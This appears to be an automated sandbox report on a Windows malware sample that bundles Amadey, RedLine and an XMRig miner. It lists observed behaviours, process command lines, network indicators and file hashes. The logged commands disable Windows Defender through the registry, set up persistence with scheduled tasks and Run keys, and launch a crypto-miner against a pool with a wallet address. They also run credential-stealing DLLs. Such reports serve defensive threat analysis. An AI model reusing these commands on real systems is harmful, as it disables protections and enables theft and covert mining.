Analysis Overview
SHA256
da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e
Threat Level: Known bad
The file da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e was found to be: Known bad.
Malicious Activity Summary
Amadey
Aurora
RedLine payload
Modifies Windows Defender Real-time Protection settings
RedLine
xmrig
XMRig Miner payload
Downloads MZ/PE file
Reads user/profile data of web browsers
Executes dropped EXE
Windows security modification
Loads dropped DLL
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Program crash
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-24 23:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-24 23:51
Reported
2023-02-24 23:53
Platform
win10-20230220-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
Amadey
Aurora
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
RedLine
RedLine payload
xmrig
XMRig Miner payload
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\prima.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020051\\prima.exe" | C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3516 set thread context of 3996 | N/A | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\rundll32.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe
"C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "Admin:N"&&CACLS "..\4f9dd6f8a7" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe
"C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe
C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe
"C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe"
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe
"C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe"
C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe
"C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 42iqvxeZwhYZGrYzGc44d3fv9Aq6TQ5jLbULdoHwfUd3Cnw6Ji2NC8G2LMxr6SwWTDGbrQs5rPXLk5odWxxnuj13K7yPrKZ.RIG1 -p X --algo rx/0 --cpu-max-threads-hint=50
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1848 -s 608
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
Network
| Country | Destination | Domain | Proto |
| DE | 193.233.20.23:4124 | | tcp |
| US | 8.8.8.8:53 | 23.20.233.193.in-addr.arpa | udp |
| JP | 40.74.98.194:443 | | tcp |
| DE | 193.233.20.23:4124 | | tcp |
| NL | 178.79.208.1:80 | tcp | |
| US | 8.8.8.8:53 | 1.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.148.119.40.in-addr.arpa | udp |
| DE | 193.233.20.15:80 | 193.233.20.15 | tcp |
| DE | 193.233.20.19:80 | 193.233.20.19 | tcp |
| US | 8.8.8.8:53 | 19.20.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.20.233.193.in-addr.arpa | udp |
| RU | 62.204.41.245:80 | 62.204.41.245 | tcp |
| US | 8.8.8.8:53 | 245.41.204.62.in-addr.arpa | udp |
| RU | 62.204.41.88:80 | 62.204.41.88 | tcp |
| NL | 185.246.221.126:80 | 185.246.221.126 | tcp |
| US | 8.8.8.8:53 | 88.41.204.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.221.246.185.in-addr.arpa | udp |
| NL | 45.15.159.15:80 | 45.15.159.15 | tcp |
| NL | 212.87.204.93:8081 | | tcp |
| US | 8.8.8.8:53 | 15.159.15.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.204.87.212.in-addr.arpa | udp |
| DE | 193.233.20.23:4124 | | tcp |
| DE | 193.233.20.23:4124 | | tcp |
| US | 8.8.8.8:53 | xiaoxiaojue.duckdns.org | udp |
| NL | 212.87.204.245:55215 | xiaoxiaojue.duckdns.org | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 245.204.87.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:2222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
| MD5 | 48d76ba7eba9fe36abfdcf0eb805d4e6 |
| SHA1 | 50290672b453e591c60754011b3651ed80acee6a |
| SHA256 | 98f0908162a9ff04724af618b89f18f372c516aa308bc45a960cfd5732a319a3 |
| SHA512 | 6959d0c37e5da7b7f26d827a8b51972a901a1f8262a5b4f5af485fe10b4e1cfe57d2c17b6c2b84e8cd8282ddfbc8d673ef5c5b82b3fa2ec34ccc2bc9aca3e029 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
| MD5 | 011f572cd01040ae90f4c2bec985279e |
| SHA1 | 53b48ee92c94b118051ae561091cf3f09445e5a2 |
| SHA256 | 88feb9c9fefc90e4e5692cbe903f14acf18d2abc3811a7cbe1c22634b83c3021 |
| SHA512 | 198edfebf162d32c88f58eb1dd415110fed01655164e6e195a2b1ec7863a7d300ca04ff3cbac7b96f0abef9e31304b4f68479d909a93ca311ba6bc2f6fb9d4f5 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
| MD5 | 24c66ce9bd9f1848461d318aaa2965d1 |
| SHA1 | e1654fb970dd38239f22aa980faf5db20fe6ac31 |
| SHA256 | 651f812f9cdeed77d6a0078fdc425a036ef00dff1b452da53683b048522c2b33 |
| SHA512 | 263841ddd5975ee6229469db9e59e3a50523b4bb2d4c8bf8350fc8e614a288440103176b8321b9fc582a020e8ad4eff28496aa0d92e8fecb7c584c3f321ab92c |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
| MD5 | 96bc4aa13190b64dbac933e84b3755bf |
| SHA1 | 02eea495c0471e5bf620fcbb1e7236a9af6884d7 |
| SHA256 | 813d515b4bf61ca4ec78dcca4ec5881d170f40fec4ba94dd6126b693f1f24a1a |
| SHA512 | 12e9eeb9a8b44a71e84d962072d6a19a2cee2b115299eab8378ef822fd933faaf97f606b4c5febe059a5c9d81d75aa331ee591fc2bb2d69fc2dd4d3fd5868fc8 |
memory/4928-149-0x00000000007F0000-0x00000000007FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
| MD5 | a6adc2e80b48f93ba7b7a58f2465d794 |
| SHA1 | f27bbdf26dbb193c5f5e8ee97aea6e786562fd0a |
| SHA256 | a8d3a71edf6a6d2a647021f26bc97cf728dccf92b22663e6b9624f43fff427f4 |
| SHA512 | ec7797e25e7ccc87ecd84b2e658ce547db2ee46329c78437c03b55117cc1c56a55a6c267f92aabf5debbad324d6233c87e102db12a3d562d769c08424ed79c41 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
| MD5 | 15a7da184b4135671866c5a513488eaa |
| SHA1 | 701d7ff9873ea4d7c8d823d49c7165c71f51359f |
| SHA256 | 7331dd12fb82b536b22cf07311682a6e31344d9b90321c5dd5f20fa2a575d7a8 |
| SHA512 | 08bebb9574279c4d017f6c533311f62620101ed42356944493a9c6ed14f702465fae9d3b86df8835c9ee66c55fdc0b1f381050427a2f0cc22579160934c3f251 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
| MD5 | a6adc2e80b48f93ba7b7a58f2465d794 |
| SHA1 | f27bbdf26dbb193c5f5e8ee97aea6e786562fd0a |
| SHA256 | a8d3a71edf6a6d2a647021f26bc97cf728dccf92b22663e6b9624f43fff427f4 |
| SHA512 | ec7797e25e7ccc87ecd84b2e658ce547db2ee46329c78437c03b55117cc1c56a55a6c267f92aabf5debbad324d6233c87e102db12a3d562d769c08424ed79c41 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
| MD5 | a7ad3f23c4bdb0122dbb1557223eee4c |
| SHA1 | fe2201cdb7f2f678d533abd2b0479cdadc63c54d |
| SHA256 | 947d7ec35a3e57d7b835bb14276584cce4b926a9e9ea6378d10b2d9069d0b59f |
| SHA512 | 8df206f3a3b07b0c5a119fb2c75697cb7055f2f313f35a140542f212e8b4133ada7d74a42b27865b4000f5d20fc2727783da92cea91f56fe7fdff77dddffae2b |
